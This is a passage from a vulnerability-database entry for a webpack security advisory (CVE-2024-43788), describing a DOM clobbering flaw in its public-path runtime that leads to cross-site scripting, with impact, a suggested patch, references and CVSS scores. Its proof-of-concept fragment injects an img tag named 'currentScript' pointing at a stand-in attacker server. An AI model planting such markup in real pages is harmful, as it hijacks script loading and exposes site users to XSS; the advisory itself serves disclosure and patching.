<img name=\"currentScript\" src=\"https://attacker.controlled.server/\"></img>\n <!-- Attacker-controlled Script-less HTML Element ends--!>\n</head>\n<script src=\"./dist/webpack-gadgets.bundle.js\"></script>\n<body>\n</body>\n</html>\n```\n\n### Impact\n\nThis vulnerability can lead to cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or id attributes.\n\n### Patch\n\nA possible patch to this vulnerability could refer to the Google Closure project which makes itself resistant to DOM Clobbering attack: https://github.com/google/closure-library/blob/b312823ec5f84239ff1db7526f4a75cba0420a33/closure/goog/base.js#L174\n\n```\n/******/ \t/* webpack/runtime/publicPath */\n/******/ \t(() => {\n/******/ \t\tvar scriptUrl;\n/******/ \t\tif (__webpack_require__.g.importScripts) scriptUrl = __webpack_require__.g.location + \"\";\n/******/ \t\tvar document = __webpack_require__.g.document;\n/******/ \t\tif (!scriptUrl && document) {\n/******/ \t\t\tif (document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT') // Assume attacker cannot control script tag, otherwise it is XSS already :>\n/******/ \t\t\t\tscriptUrl = document.currentScript.src;\n/******/ \t\t\tif (!scriptUrl) {\n/******/ \t\t\t\tvar scripts = document.getElementsByTagName(\"script\");\n/******/ \t\t\t\tif(scripts.length) {\n/******/ \t\t\t\t\tvar i = scripts.length - 1;\n/******/ \t\t\t\t\twhile (i > -1 && (!scriptUrl || !/^http(s?):/.test(scriptUrl))) scriptUrl = scripts[i--].src;\n/******/ \t\t\t\t}\n/******/ \t\t\t}\n/******/ \t\t}\n/******/ \t\t// When supporting browsers where an automatic publicPath is not supported you must specify an output.publicPath manually via configuration\n/******/ \t\t// or pass an empty string (\"\") and set the __webpack_public_path__ variable from your code to use your own logic.\n/******/ \t\tif (!scriptUrl) throw new Error(\"Automatic publicPath is not supported in this browser\");\n/******/ \t\tscriptUrl = scriptUrl.replace(/#.*$/, \"\").replace(/\\?.*$/, \"\").replace(/\\/[^\\/]+$/, \"/\");\n/******/ \t\t__webpack_require__.p = scriptUrl;\n/******/ \t})();\n```\n\nPlease note that if we do not receive a response from the development team within three months, we will disclose this vulnerability to the CVE agent.", id: "GHSA-4vvj-4cpr-p986", modified: "2024-09-03T17:09:18Z", published: "2024-08-27T19:50:40Z", references: [ { type: "WEB", url: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", }, { type: "ADVISORY", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", }, { type: "WEB", url: "https://github.com/webpack/webpack/issues/18718#issuecomment-2326296270", }, { type: "WEB", url: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", }, { type: "PACKAGE", url: "https://github.com/webpack/webpack", }, { type: "WEB", url: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", }, { type: "WEB", url: "https://scnps.co/papers/sp23_domclob.pdf", }, ], schema_version: "1.4.0", severity: [ { score: "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H", type: "CVSS_V3", }, { score: "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N", type: "CVSS_V4", }, ], summary: "Webpack's AutoPublicPathRuntimeModule has a DOM Clobbering Gadget that leads to XSS", }
Log in or create an account to share your comment.
Security Advisory comment format.
This schema specifies the format of a comment related to a security advisory.
Title of the comment
Description of the comment
Loading…
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.